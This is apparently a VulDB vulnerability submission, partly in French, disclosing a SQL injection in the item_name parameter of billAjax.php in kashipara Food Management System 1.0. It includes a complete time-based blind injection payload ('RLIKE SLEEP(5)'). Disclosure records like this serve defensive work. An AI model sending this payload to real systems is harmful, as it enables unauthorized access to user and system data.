Soumettre #261888: kashipara Food Management System ≤1.0 SQL injectioninformation

Titrekashipara Food Management System ≤1.0 SQL injection
DescriptionSQL injection vulnerability exists in item_name parameter of billAjax.php file of Food Management System Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload: chk_in_date=03-01-2024&custmer_details=1&initialprice[]=1&item_name[]=pHqghUme' RLIKE SLEEP(5) AND 'CuJa'='CuJa&item_price[]=0&itemnumber[]=1&itemype[]=0&pay_cost=1&price_type=item_price_dist&subButton=Place Order&totalAmount=0.00&transpotation_name=1
La source⚠️ https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf
Utilisateur
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Soumission03/01/2024 11:09 (il y a 2 ans)
Modérer06/01/2024 11:15 (3 days later)
StatutAccepté
Entrée VulDB249829 [Kashipara Food Management System jusqu’à 1.0 billAjax.php item_name injection SQL]
Points20

Do you know our Splunk app?

Download it now for free!